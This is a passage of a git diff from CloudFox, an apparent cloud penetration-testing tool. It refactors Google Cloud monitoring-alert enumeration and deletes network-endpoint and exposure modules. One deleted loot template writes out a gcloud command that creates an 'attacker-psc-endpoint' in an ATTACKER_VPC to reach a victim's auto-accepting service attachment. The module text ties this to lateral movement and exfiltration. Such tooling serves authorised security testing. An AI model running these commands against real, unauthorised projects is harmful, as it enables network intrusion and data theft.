strings.Contains(nameLower, "audit") { - m.mu.Lock() - m.hasAuditLogAlert = true - m.mu.Unlock() - } -} - -// ------------------------------ -// Gap Analysis -// ------------------------------ -func (m *MonitoringAlertsModule) analyzeAlertGaps(logger internal.Logger) { - // Check for disabled alerts - for _, policy := range m.AlertPolicies { - if !policy.Enabled { - gap := AlertGap{ - GapType: "disabled-alert", - Severity: "MEDIUM", - Description: fmt.Sprintf("Alert policy '%s' is disabled", policy.DisplayName), - Recommendation: fmt.Sprintf("Enable the alert policy if it's still needed: gcloud alpha monitoring policies update %s --enabled", policy.Name), - AffectedArea: policy.DisplayName, - } - m.AlertGaps = append(m.AlertGaps, gap) - } - - // Check for alerts without notifications - if policy.NotificationCount == 0 && policy.Enabled { - gap := AlertGap{ - GapType: "no-notification", - Severity: "HIGH", - Description: fmt.Sprintf("Alert policy '%s' has no notification channels", policy.DisplayName), - Recommendation: "Add notification channels to ensure alerts are received", - AffectedArea: policy.DisplayName, - } - m.AlertGaps = append(m.AlertGaps, gap) - } - } - - // Check for unverified notification channels - for _, channel := range m.NotificationChannels { - if !channel.Verified && channel.Enabled { - gap := AlertGap{ - GapType: "unverified-channel", - Severity: "MEDIUM", - Description: fmt.Sprintf("Notification channel '%s' (%s) is not verified", channel.DisplayName, channel.Type), - Recommendation: "Verify the notification channel to ensure alerts are delivered", - AffectedArea: channel.DisplayName, - } - m.AlertGaps = append(m.AlertGaps, gap) - } - - if !channel.Enabled { - gap := AlertGap{ - GapType: "disabled-channel", - Severity: "LOW", - Description: fmt.Sprintf("Notification channel '%s' is disabled", channel.DisplayName), - Recommendation: "Enable or remove unused notification channels", - AffectedArea: channel.DisplayName, - } - m.AlertGaps = append(m.AlertGaps, gap) - } - } - - // Check for missing security alerts - if !m.hasIAMChangeAlert { - gap := AlertGap{ - GapType: "missing-alert", - Severity: "HIGH", - Description: "No alert policy for IAM policy changes", - Recommendation: "Create an alert for protoPayload.methodName=\"SetIamPolicy\"", - AffectedArea: "IAM Security", - } - m.AlertGaps = append(m.AlertGaps, gap) - m.addMissingAlertToLoot("IAM Policy Changes", `resource.type="project" AND protoPayload.methodName="SetIamPolicy"`) - } - - if !m.hasFirewallChangeAlert { - gap := AlertGap{ - GapType: "missing-alert", - Severity: "HIGH", - Description: "No alert policy for firewall rule changes", - Recommendation: "Create an alert for compute.firewalls.* methods", - AffectedArea: "Network Security", - } - m.AlertGaps = append(m.AlertGaps, gap) - m.addMissingAlertToLoot("Firewall Changes", `resource.type="gce_firewall_rule" AND protoPayload.methodName=~"compute.firewalls.*"`) - } - - if !m.hasNetworkChangeAlert { - gap := AlertGap{ - GapType: "missing-alert", - Severity: "MEDIUM", - Description: "No alert policy for VPC network changes", - Recommendation: "Create an alert for compute.networks.* methods", - AffectedArea: "Network Security", - } - m.AlertGaps = append(m.AlertGaps, gap) - m.addMissingAlertToLoot("VPC Network Changes", `resource.type="gce_network" AND protoPayload.methodName=~"compute.networks.*"`) - } - - if !m.hasSAKeyAlert { - gap := AlertGap{ - GapType: "missing-alert", - Severity: "HIGH", - Description: "No alert policy for service account key creation", - Recommendation: "Create an alert for CreateServiceAccountKey method", - AffectedArea: "IAM Security", - } - m.AlertGaps = append(m.AlertGaps, gap) - m.addMissingAlertToLoot("Service Account Key Creation", `protoPayload.methodName="google.iam.admin.v1.CreateServiceAccountKey"`) - } - - if !m.hasAuditLogAlert { - gap := AlertGap{ - GapType: "missing-alert", - Severity: "MEDIUM", - Description: "No alert policy for audit configuration changes", - Recommendation: "Create an alert for SetIamPolicy on audit configs", - AffectedArea: "Logging Security", - } - m.AlertGaps = append(m.AlertGaps, gap) - m.addMissingAlertToLoot("Audit Configuration Changes", `protoPayload.methodName="SetIamPolicy" AND protoPayload.serviceData.policyDelta.auditConfigDeltas:*`) - } - - // Check if no notification channels exist at all - if len(m.NotificationChannels) == 0 && len(m.AlertPolicies) > 0 { - gap := AlertGap{ - GapType: "missing-alert", - Severity: "CRITICAL", - Description: "No notification channels configured", - Recommendation: "Create notification channels (email, Slack, PagerDuty) to receive alerts", - AffectedArea: "Alert Delivery", - } - m.AlertGaps = append(m.AlertGaps, gap) - } -} - -func (m *MonitoringAlertsModule) addMissingAlertToLoot(alertName, filter string) { - m.mu.Lock() - defer m.mu.Unlock() - - m.LootMap["missing-alerts"].Contents += fmt.Sprintf( - "## Missing Alert: %s\n"+ - "Recommended Filter:\n"+ - "%s\n\n"+ - "# Create with gcloud:\n"+ - "# gcloud alpha monitoring policies create --display-name=\"%s\" \\\n"+ - "# --condition-filter=\"%s\"\n\n", - alertName, filter, alertName, filter, - ) -} // ------------------------------ // Helper Functions @@ -695,21 +444,9 @@ func (m *MonitoringAlertsModule) extractMetricType(filter string) string { // Loot File Management // ------------------------------ func (m *MonitoringAlertsModule) initializeLootFiles() { - m.LootMap["disabled-alerts"] = &internal.LootFile{ - Name: "disabled-alerts", - Contents: "# Disabled Alert Policies\n# Generated by CloudFox\n\n", - } - m.LootMap["missing-alerts"] = &internal.LootFile{ - Name: "missing-alerts", - Contents: "# Missing Security Alerts\n# Generated by CloudFox\n# Recommended alerts for security monitoring\n\n", - } - m.LootMap["alert-setup-commands"] = &internal.LootFile{ - Name: "alert-setup-commands", - Contents: "# Alert Setup Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["notification-channels"] = &internal.LootFile{ - Name: "notification-channels", - Contents: "# Notification Channels\n# Generated by CloudFox\n\n", + m.LootMap["monitoring-alerts-commands"] = &internal.LootFile{ + Name: "monitoring-alerts-commands", + Contents: "# Monitoring Alerts Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } @@ -717,156 +454,217 @@ func (m *MonitoringAlertsModule) initializeLootFiles() { // Output Generation // ------------------------------ func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Sort policies by enabled status and name + // Build notification channel name map for resolving channel references + channelNameMap := make(map[string]string) + for _, c := range m.NotificationChannels { + channelNameMap[c.Name] = c.DisplayName + } + + // Sort policies by name sort.Slice(m.AlertPolicies, func(i, j int) bool { - if m.AlertPolicies[i].Enabled != m.AlertPolicies[j].Enabled { - return m.AlertPolicies[i].Enabled - } return m.AlertPolicies[i].DisplayName < m.AlertPolicies[j].DisplayName }) - // Alert Policies table + // Alert Policies table - one row per condition policiesHeader := []string{ - "Policy", "Project Name", "Project ID", + "Policy Name", "Enabled", - "Conditions", - "Notifications", - "Combiner", + "Condition Name", + "Metric Type", + "Comparison", + "Threshold", + "Duration", + "Notification Channels", } var policiesBody [][]string for _, p := range m.AlertPolicies { - enabled := "No" - if p.Enabled { - enabled = "Yes" - } - - policiesBody = append(policiesBody, []string{ - truncateString(p.DisplayName, 40), - m.GetProjectName(p.ProjectID), - p.ProjectID, - enabled, - fmt.Sprintf("%d", p.ConditionCount), - fmt.Sprintf("%d", p.NotificationCount), - p.Combiner, - }) - - // Add disabled alerts to loot - if !p.Enabled { - m.LootMap["disabled-alerts"].Contents += fmt.Sprintf( - "## %s\n"+ - "Project: %s\n"+ - "Name: %s\n"+ - "# Enable: gcloud alpha monitoring policies update %s --enabled\n\n", - p.DisplayName, p.ProjectID, p.Name, p.Name, - ) + // Resolve notification channel names + var channelNames []string + for _, channelRef := range p.NotificationChannels { + if name, ok := channelNameMap[channelRef]; ok { + channelNames = append(channelNames, name) + } else { + // Extract name from resource path if not found + parts := strings.Split(channelRef, "/") + if len(parts) > 0 { + channelNames = append(channelNames, parts[len(parts)-1]) + } + } + } + notificationChannelsStr := "-" + if len(channelNames) > 0 { + notificationChannelsStr = strings.Join(channelNames, ", ") } + + // If policy has conditions, create one row per condition + if len(p.Conditions) > 0 { + for _, cond := range p.Conditions { + metricType := cond.MetricType + if metricType == "" { + metricType = "-" + } + comparison := cond.Comparison + if comparison == "" { + comparison = "-" + } + threshold := "-" + if cond.ThresholdValue != 0 { + threshold = fmt.Sprintf("%.2f", cond.ThresholdValue) + } + duration := cond.Duration + if duration == "" { + duration = "-" + } + + policiesBody = append(policiesBody, []string{ + m.GetProjectName(p.ProjectID), + p.ProjectID, + p.DisplayName, + boolToYesNo(p.Enabled), + cond.DisplayName, + metricType, + comparison, + threshold, + duration, + notificationChannelsStr, + }) + } + } else { + // Policy with no conditions - single row + policiesBody = append(policiesBody, []string{ + m.GetProjectName(p.ProjectID), + p.ProjectID, + p.DisplayName, + boolToYesNo(p.Enabled), + "-", + "-", + "-", + "-", + "-", + notificationChannelsStr, + }) + } + + // Add to loot + m.LootMap["monitoring-alerts-commands"].Contents += fmt.Sprintf( + "## Policy: %s (Project: %s)\n"+ + "# Describe alert policy:\n"+ + "gcloud alpha monitoring policies describe %s --project=%s\n\n", + p.DisplayName, p.ProjectID, + extractResourceName(p.Name), p.ProjectID, + ) } - // Notification Channels table + // Notification Channels table - with destination info channelsHeader := []string{ - "Channel", "Project Name", "Project ID", + "Channel Name", "Type", "Enabled", "Verified", + "Destination", } var channelsBody [][]string for _, c := range m.NotificationChannels { - enabled := "No" - if c.Enabled { - enabled = "Yes" - } - verified := "No" - if c.Verified { - verified = "Yes" - } + // Extract destination from labels based on type + destination := extractChannelDestination(c.Type, c.Labels) channelsBody = append(channelsBody, []string{ - truncateString(c.DisplayName, 40), m.GetProjectName(c.ProjectID), c.ProjectID, + c.DisplayName, c.Type, - enabled, - verified, + boolToYesNo(c.Enabled), + boolToYesNo(c.Verified), + destination, }) - // Add to notification channels loot - m.LootMap["notification-channels"].Contents += fmt.Sprintf( - "%s (%s) - Enabled: %t, Verified: %t\n", - c.DisplayName, c.Type, c.Enabled, c.Verified, + // Add to loot + m.LootMap["monitoring-alerts-commands"].Contents += fmt.Sprintf( + "## Channel: %s (Project: %s)\n"+ + "# Describe notification channel:\n"+ + "gcloud alpha monitoring channels describe %s --project=%s\n\n", + c.DisplayName, c.ProjectID, + extractResourceName(c.Name), c.ProjectID, ) } - // Alert Gaps table - gapsHeader := []string{ - "Gap Type", - "Severity", - "Affected Area", - "Description", - } - - var gapsBody [][]string - for _, g := range m.AlertGaps { - gapsBody = append(gapsBody, []string{ - g.GapType, - g.Severity, - g.AffectedArea, - truncateString(g.Description, 50), - }) - - // Add setup commands to loot - if g.Recommendation != "" { - m.LootMap["alert-setup-commands"].Contents += fmt.Sprintf( - "# %s (%s)\n# %s\n%s\n\n", - g.AffectedArea, g.GapType, g.Description, g.Recommendation, - ) - } - } - - // Uptime Checks table + // Uptime Checks table - expanded uptimeHeader := []string{ - "Check", "Project Name", "Project ID", + "Check Name", + "Enabled", "Host", "Protocol", "Port", + "Path", "Period", + "Timeout", + "SSL Enabled", } var uptimeBody [][]string for _, u := range m.UptimeChecks { + host := u.MonitoredHost + if host == "" { + host = "-" + } + path := u.Path + if path == "" { + path = "-" + } + timeout := u.Timeout + if timeout == "" { + timeout = "-" + } + uptimeBody = append(uptimeBody, []string{ - truncateString(u.DisplayName, 30), m.GetProjectName(u.ProjectID), u.ProjectID, - truncateString(u.MonitoredHost, 30), + u.DisplayName, + boolToYesNo(u.Enabled), + host, u.Protocol, fmt.Sprintf("%d", u.Port), + path, u.Period, + timeout, + boolToYesNo(u.SSLEnabled), }) + + // Add to loot + m.LootMap["monitoring-alerts-commands"].Contents += fmt.Sprintf( + "## Uptime Check: %s (Project: %s)\n"+ + "# Describe uptime check:\n"+ + "gcloud alpha monitoring uptime describe %s --project=%s\n\n", + u.DisplayName, u.ProjectID, + extractResourceName(u.Name), u.ProjectID, + ) } // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } // Build tables - tables := []internal.TableFile{ - { + var tables []internal.TableFile + + if len(policiesBody) > 0 { + tables = append(tables, internal.TableFile{ Name: "alerting-policies", Header: policiesHeader, Body: policiesBody, - }, + }) } if len(channelsBody) > 0 { @@ -877,14 +675,6 @@ func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger interna }) } - if len(gapsBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "alert-gaps", - Header: gapsHeader, - Body: gapsBody, - }) - } - if len(uptimeBody) > 0 { tables = append(tables, internal.TableFile{ Name: "uptime-checks", @@ -912,8 +702,8 @@ func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger interna m.Verbosity, m.WrapTable, "project", - scopeNames, m.ProjectIDs, + scopeNames, m.Account, output, ) @@ -922,3 +712,50 @@ func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger interna m.CommandCounter.Error++ } } + +// extractChannelDestination extracts the destination info from channel labels +func extractChannelDestination(channelType string, labels map[string]string) string { + if labels == nil { + return "-" + } + + switch channelType { + case "email": + if email, ok := labels["email_address"]; ok { + return email + } + case "slack": + if channel, ok := labels["channel_name"]; ok { + return channel + } + case "pagerduty": + if key, ok := labels["service_key"]; ok { + // Truncate service key for display + if len(key) > 12 { + return key[:12] + "..." + } + return key + } + case "webhook_tokenauth", "webhook_basicauth": + if url, ok := labels["url"]; ok { + return url + } + case "pubsub": + if topic, ok := labels["topic"]; ok { + return topic + } + case "sms": + if number, ok := labels["number"]; ok { + return number + } + } + + // Try common label keys + for _, key := range []string{"url", "address", "endpoint", "target"} { + if val, ok := labels[key]; ok { + return val + } + } + + return "-" +} diff --git a/gcp/commands/networkendpoints.go b/gcp/commands/networkendpoints.go deleted file mode 100644 index 92006252..00000000 --- a/gcp/commands/networkendpoints.go +++ /dev/null @@ -1,417 +0,0 @@ -package commands - -import ( - "context" - "fmt" - "strings" - "sync" - - networkendpointsservice "github.com/BishopFox/cloudfox/gcp/services/networkEndpointsService" - "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" - gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" - "github.com/spf13/cobra" -) - -var GCPNetworkEndpointsCommand = &cobra.Command{ - Use: globals.GCP_NETWORKENDPOINTS_MODULE_NAME, - Aliases: []string{"psc", "private-service-connect", "endpoints"}, - Short: "Enumerate Private Service Connect endpoints and service attachments", - Long: `Enumerate Private Service Connect (PSC) endpoints, private connections, and service attachments. - -Private Service Connect allows private connectivity to Google APIs and services, -as well as to services hosted by other organizations. - -Security Relevance: -- PSC endpoints provide internal network paths to external services -- Service attachments expose internal services to other projects -- Private connections (VPC peering for managed services) provide access to Cloud SQL, etc. -- These can be used for lateral movement or data exfiltration - -What this module finds: -- PSC forwarding rules (consumer endpoints) -- Service attachments (producer endpoints) -- Private service connections (e.g., to Cloud SQL private IPs) -- Connection acceptance policies (auto vs manual)`, - Run: runGCPNetworkEndpointsCommand, -} - -// ------------------------------ -// Module Struct -// ------------------------------ -type NetworkEndpointsModule struct { - gcpinternal.BaseGCPModule - - PSCEndpoints []networkendpointsservice.PrivateServiceConnectEndpoint - PrivateConnections []networkendpointsservice.PrivateConnection - ServiceAttachments []networkendpointsservice.ServiceAttachment - LootMap map[string]*internal.LootFile - mu sync.Mutex -} - -// ------------------------------ -// Output Struct -// ------------------------------ -type NetworkEndpointsOutput struct { - Table []internal.TableFile - Loot []internal.LootFile -} - -func (o NetworkEndpointsOutput) TableFiles() []internal.TableFile { return o.Table } -func (o NetworkEndpointsOutput) LootFiles() []internal.LootFile { return o.Loot } - -// ------------------------------ -// Command Entry Point -// ------------------------------ -func runGCPNetworkEndpointsCommand(cmd *cobra.Command, args []string) { - cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_NETWORKENDPOINTS_MODULE_NAME) - if err != nil { - return - } - - module := &NetworkEndpointsModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - PSCEndpoints: []networkendpointsservice.PrivateServiceConnectEndpoint{}, - PrivateConnections: []networkendpointsservice.PrivateConnection{}, - ServiceAttachments: []networkendpointsservice.ServiceAttachment{}, - LootMap: make(map[string]*internal.LootFile), - } - - module.initializeLootFiles() - module.Execute(cmdCtx.Ctx, cmdCtx.Logger) -} - -// ------------------------------ -// Module Execution -// ------------------------------ -func (m *NetworkEndpointsModule) Execute(ctx context.Context, logger internal.Logger) { - m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_NETWORKENDPOINTS_MODULE_NAME, m.processProject) - - totalFindings := len(m.PSCEndpoints) + len(m.PrivateConnections) + len(m.ServiceAttachments) - - if totalFindings == 0 { - logger.InfoM("No network endpoints found", globals.GCP_NETWORKENDPOINTS_MODULE_NAME) - return - } - - logger.SuccessM(fmt.Sprintf("Found %d PSC endpoint(s), %d private connection(s), %d service attachment(s)", - len(m.PSCEndpoints), len(m.PrivateConnections), len(m.ServiceAttachments)), globals.GCP_NETWORKENDPOINTS_MODULE_NAME) - - // Count high-risk findings - autoAcceptCount := 0 - for _, sa := range m.ServiceAttachments { - if sa.ConnectionPreference == "ACCEPT_AUTOMATIC" { - autoAcceptCount++ - } - } - if autoAcceptCount > 0 { - logger.InfoM(fmt.Sprintf("[HIGH] %d service attachment(s) auto-accept connections from any project", autoAcceptCount), globals.GCP_NETWORKENDPOINTS_MODULE_NAME) - } - - m.writeOutput(ctx, logger) -} - -// ------------------------------ -// Project Processor -// ------------------------------ -func (m *NetworkEndpointsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Checking network endpoints in project: %s", projectID), globals.GCP_NETWORKENDPOINTS_MODULE_NAME) - } - - svc := networkendpointsservice.New() - - // Get PSC endpoints - pscEndpoints, err := svc.GetPrivateServiceConnectEndpoints(projectID) - if err != nil { - m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, globals.GCP_NETWORKENDPOINTS_MODULE_NAME, - fmt.Sprintf("Could not get PSC endpoints in project %s", projectID)) - } - - // Get private connections - privateConns, err := svc.GetPrivateConnections(projectID) - if err != nil { - m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, globals.GCP_NETWORKENDPOINTS_MODULE_NAME, - fmt.Sprintf("Could not get private connections in project %s", projectID)) - } - - // Get service attachments - attachments, err := svc.GetServiceAttachments(projectID) - if err != nil { - m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, globals.GCP_NETWORKENDPOINTS_MODULE_NAME, - fmt.Sprintf("Could not get service attachments in project %s", projectID)) - } - - m.mu.Lock() - m.PSCEndpoints = append(m.PSCEndpoints, pscEndpoints...) - m.PrivateConnections = append(m.PrivateConnections, privateConns...) - m.ServiceAttachments = append(m.ServiceAttachments, attachments...) - - for _, endpoint := range pscEndpoints { - m.addPSCEndpointToLoot(endpoint) - } - for _, conn := range privateConns { - m.addPrivateConnectionToLoot(conn) - } - for _, attachment := range attachments { - m.addServiceAttachmentToLoot(attachment) - } - m.mu.Unlock() -} - -// ------------------------------ -// Loot File Management -// ------------------------------ -func (m *NetworkEndpointsModule) initializeLootFiles() { - m.LootMap["psc-endpoints"] = &internal.LootFile{ - Name: "psc-endpoints", - Contents: "# Private Service Connect Endpoints\n# Generated by CloudFox\n\n", - } - m.LootMap["private-connections"] = &internal.LootFile{ - Name: "private-connections", - Contents: "# Private Service Connections (VPC Peering for Managed Services)\n# Generated by CloudFox\n\n", - } - m.LootMap["service-attachments"] = &internal.LootFile{ - Name: "service-attachments", - Contents: "# PSC Service Attachments (Producer Side)\n# Generated by CloudFox\n\n", - } - m.LootMap["auto-accept-attachments"] = &internal.LootFile{ - Name: "auto-accept-attachments", - Contents: "# HIGH RISK: Service Attachments with Auto-Accept\n# Generated by CloudFox\n# These accept connections from ANY project!\n\n", - } -} - -func (m *NetworkEndpointsModule) addPSCEndpointToLoot(endpoint networkendpointsservice.PrivateServiceConnectEndpoint) { - m.LootMap["psc-endpoints"].Contents += fmt.Sprintf( - "## [%s] %s\n"+ - "## Project: %s | Region: %s\n"+ - "## Network: %s | Subnet: %s\n"+ - "## IP Address: %s\n"+ - "## Target Type: %s\n"+ - "## Target: %s\n"+ - "## Connection State: %s\n", - endpoint.RiskLevel, endpoint.Name, - endpoint.ProjectID, endpoint.Region, - endpoint.Network, endpoint.Subnetwork, - endpoint.IPAddress, - endpoint.TargetType, - endpoint.Target, - endpoint.ConnectionState, - ) - for _, reason := range endpoint.RiskReasons { - m.LootMap["psc-endpoints"].Contents += fmt.Sprintf("## - %s\n", reason) - } - for _, cmd := range endpoint.ExploitCommands { - m.LootMap["psc-endpoints"].Contents += cmd + "\n" - } - m.LootMap["psc-endpoints"].Contents += "\n" -} - -func (m *NetworkEndpointsModule) addPrivateConnectionToLoot(conn networkendpointsservice.PrivateConnection) { - m.LootMap["private-connections"].Contents += fmt.Sprintf( - "## [%s] %s\n"+ - "## Project: %s | Network: %s\n"+ - "## Service: %s\n"+ - "## Peering: %s\n"+ - "## Reserved Ranges: %s\n"+ - "## Accessible Services: %s\n", - conn.RiskLevel, conn.Name, - conn.ProjectID, conn.Network, - conn.Service, - conn.PeeringName, - strings.Join(conn.ReservedRanges, ", "), - strings.Join(conn.AccessibleServices, ", "), - ) - for _, reason := range conn.RiskReasons { - m.LootMap["private-connections"].Contents += fmt.Sprintf("## - %s\n", reason) - } - m.LootMap["private-connections"].Contents += "\n" -} - -func (m *NetworkEndpointsModule) addServiceAttachmentToLoot(attachment networkendpointsservice.ServiceAttachment) { - m.LootMap["service-attachments"].Contents += fmt.Sprintf( - "## [%s] %s\n"+ - "## Project: %s | Region: %s\n"+ - "## Target Service: %s\n"+ - "## Connection Preference: %s\n"+ - "## Connected Endpoints: %d\n"+ - "## NAT Subnets: %s\n", - attachment.RiskLevel, attachment.Name, - attachment.ProjectID, attachment.Region, - attachment.TargetService, - attachment.ConnectionPreference, - attachment.ConnectedEndpoints, - strings.Join(attachment.NatSubnets, ", "), - ) - - if len(attachment.ConsumerAcceptLists) > 0 { - m.LootMap["service-attachments"].Contents += fmt.Sprintf("## Accept List: %s\n", strings.Join(attachment.ConsumerAcceptLists, ", ")) - } - if len(attachment.ConsumerRejectLists) > 0 { - m.LootMap["service-attachments"].Contents += fmt.Sprintf("## Reject List: %s\n", strings.Join(attachment.ConsumerRejectLists, ", ")) - } - - for _, reason := range attachment.RiskReasons { - m.LootMap["service-attachments"].Contents += fmt.Sprintf("## - %s\n", reason) - } - m.LootMap["service-attachments"].Contents += "\n" - - // Add to auto-accept loot if applicable - if attachment.ConnectionPreference == "ACCEPT_AUTOMATIC" { - m.LootMap["auto-accept-attachments"].Contents += fmt.Sprintf( - "## [HIGH] %s\n"+ - "## Project: %s | Region: %s\n"+ - "## Target Service: %s\n"+ - "## This service attachment accepts connections from ANY project!\n"+ - "## An attacker with their own GCP project can create a PSC endpoint to this service.\n"+ - "##\n"+ - "## To connect from another project:\n"+ - "gcloud compute forwarding-rules create attacker-psc-endpoint \\\n"+ - " --region=%s \\\n"+ - " --network=ATTACKER_VPC \\\n"+ - " --address=RESERVED_IP \\\n"+ - " --target-service-attachment=projects/%s/regions/%s/serviceAttachments/%s\n\n", - attachment.Name, - attachment.ProjectID, attachment.Region, - attachment.TargetService, - attachment.Region, - attachment.ProjectID, attachment.Region, attachment.Name, - ) - } -} - -// ------------------------------ -// Output Generation -// ------------------------------ -func (m *NetworkEndpointsModule) writeOutput(ctx context.Context, logger internal.Logger) { - var tables []internal.TableFile - - // PSC Endpoints table - if len(m.PSCEndpoints) > 0 { - header := []string{"Risk", "Name", "Region", "Network", "IP", "Target Type", "Target", "Project Name", "Project"} - var body [][]string - - for _, endpoint := range m.PSCEndpoints { - target := endpoint.Target - if len(target) > 40 { - target = "..." + target[len(target)-37:] - } - - body = append(body, []string{ - endpoint.RiskLevel, - endpoint.Name, - endpoint.Region, - endpoint.Network, - endpoint.IPAddress, - endpoint.TargetType, - target, - m.GetProjectName(endpoint.ProjectID), - endpoint.ProjectID, - }) - } - - tables = append(tables, internal.TableFile{ - Name: "psc-endpoints", - Header: header, - Body: body, - }) - } - - // Private Connections table - if len(m.PrivateConnections) > 0 { - header := []string{"Risk", "Name", "Network", "Service", "Reserved Ranges", "Accessible Services", "Project Name", "Project"} - var body [][]string - - for _, conn := range m.PrivateConnections { - ranges := strings.Join(conn.ReservedRanges, ", ") - if len(ranges) > 30 { - ranges = ranges[:27] + "..." - } - - services := strings.Join(conn.AccessibleServices, ", ") - if len(services) > 30 { - services = services[:27] + "..." - } - - body = append(body, []string{ - conn.RiskLevel, - conn.Name, - conn.Network, - conn.Service, - ranges, - services, - m.GetProjectName(conn.ProjectID), - conn.ProjectID, - }) - } - - tables = append(tables, internal.TableFile{ - Name: "private-connections", - Header: header, - Body: body, - }) - } - - // Service Attachments table - if len(m.ServiceAttachments) > 0 { - header := []string{"Risk", "Name", "Region", "Target Service", "Accept Policy", "Connected", "Project Name", "Project"} - var body [][]string - - for _, attachment := range m.ServiceAttachments { - body = append(body, []string{ - attachment.RiskLevel, - attachment.Name, - attachment.Region, - attachment.TargetService, - attachment.ConnectionPreference, - fmt.Sprintf("%d", attachment.ConnectedEndpoints), - m.GetProjectName(attachment.ProjectID), - attachment.ProjectID, - }) - } - - tables = append(tables, internal.TableFile{ - Name: "service-attachments", - Header: header, - Body: body, - }) - } - - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - - output := NetworkEndpointsOutput{ - Table: tables, - Loot: lootFiles, - } - - scopeNames := make([]string, len(m.ProjectIDs)) - for i, projectID := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(projectID) - } - - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", - m.ProjectIDs, - scopeNames, - m.Account, - output, - ) - if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_NETWORKENDPOINTS_MODULE_NAME) - m.CommandCounter.Error++ - } -} diff --git a/gcp/commands/networkexposure.go b/gcp/commands/networkexposure.go deleted file mode 100644 index c45934c2..00000000 --- a/gcp/commands/networkexposure.go +++ /dev/null @@ -1,771 +0,0 @@ -package commands - -import ( - "context" - "fmt" - "sort" - "strings" - "sync" - - "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" - gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" - "github.com/spf13/cobra" - - compute "google.golang.org/api/compute/v1" - run "google.golang.org/api/run/v1" -) - -// Module name constant -const GCP_NETWORKEXPOSURE_MODULE_NAME string = "network-exposure" - -var GCPNetworkExposureCommand = &cobra.Command{ - Use: GCP_NETWORKEXPOSURE_MODULE_NAME, - Aliases: []string{"exposure", "public", "internet-facing"}, - Short: "Comprehensive view of all internet-exposed resources with risk scoring", - Long: `Enumerate all internet-facing resources in GCP with risk-based analysis. - -Features: -- Aggregates all public endpoints (Compute, Load Balancers, Cloud Run, Functions) -- Analyzes firewall rules for exposed ports -- Identifies exposed management ports (SSH, RDP, databases) -- Checks TLS/SSL configuration -- Risk-based prioritization -- Maps attack surface across projects -- Generates exploitation commands for penetration testing - -This module combines data from multiple sources to provide a complete picture -of the internet-facing attack surface.`, - Run: runGCPNetworkExposureCommand, -} - -// ------------------------------ -// Data Structures -// ------------------------------ - -type ExposedResource struct { - ResourceType string // "compute_instance", "load_balancer", "cloud_run", "cloud_function", etc. - ResourceName string - ProjectID string - ExternalIP string - FQDN string - ExposedPorts []string - Protocol string - ServiceAccount string - TLSEnabled bool - TLSVersion string - RiskLevel string // CRITICAL, HIGH, MEDIUM, LOW - RiskReasons []string - ExploitCommand string -} - -type FirewallExposure struct { - RuleName string - ProjectID string - Network string - Direction string - Action string - SourceRanges []string - Ports []string - Protocol string - TargetTags []string - IsPublic bool // 0.0.0.0/0 - RiskLevel string - RiskReasons []string -} - -type ExposureSummary struct { - ResourceType string - Count int - CriticalCount int - HighCount int -} - -// ------------------------------ -// Module Struct -// ------------------------------ -type NetworkExposureModule struct { - gcpinternal.BaseGCPModule - - ExposedResources []ExposedResource - FirewallExposures []FirewallExposure - Summaries []ExposureSummary - LootMap map[string]*internal.LootFile - mu sync.Mutex -} - -// ------------------------------ -// Output Struct -// ------------------------------ -type NetworkExposureOutput struct { - Table []internal.TableFile - Loot []internal.LootFile -} - -func (o NetworkExposureOutput) TableFiles() []internal.TableFile { return o.Table } -func (o NetworkExposureOutput) LootFiles() []internal.LootFile { return o.Loot } - -// ------------------------------ -// Command Entry Point -// ------------------------------ -func runGCPNetworkExposureCommand(cmd *cobra.Command, args []string) { - cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_NETWORKEXPOSURE_MODULE_NAME) - if err != nil { - return - } - - module := &NetworkExposureModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - ExposedResources: []ExposedResource{}, - FirewallExposures: []FirewallExposure{}, - Summaries: []ExposureSummary{}, - LootMap: make(map[string]*internal.LootFile), - } - - module.initializeLootFiles() - module.Execute(cmdCtx.Ctx, cmdCtx.Logger) -} - -// ------------------------------ -// Module Execution -// ------------------------------ -func (m *NetworkExposureModule) Execute(ctx context.Context, logger internal.Logger) { - logger.InfoM("Mapping network exposure across all resources...", GCP_NETWORKEXPOSURE_MODULE_NAME) - - // Process each project - m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_NETWORKEXPOSURE_MODULE_NAME, m.processProject) - - // Check results - if len(m.ExposedResources) == 0 && len(m.FirewallExposures) == 0 { - logger.InfoM("No exposed resources found", GCP_NETWORKEXPOSURE_MODULE_NAME) - return - } - - // Generate summaries - m.generateSummaries() - - // Count by risk level - criticalCount := 0 - highCount := 0 - for _, r := range 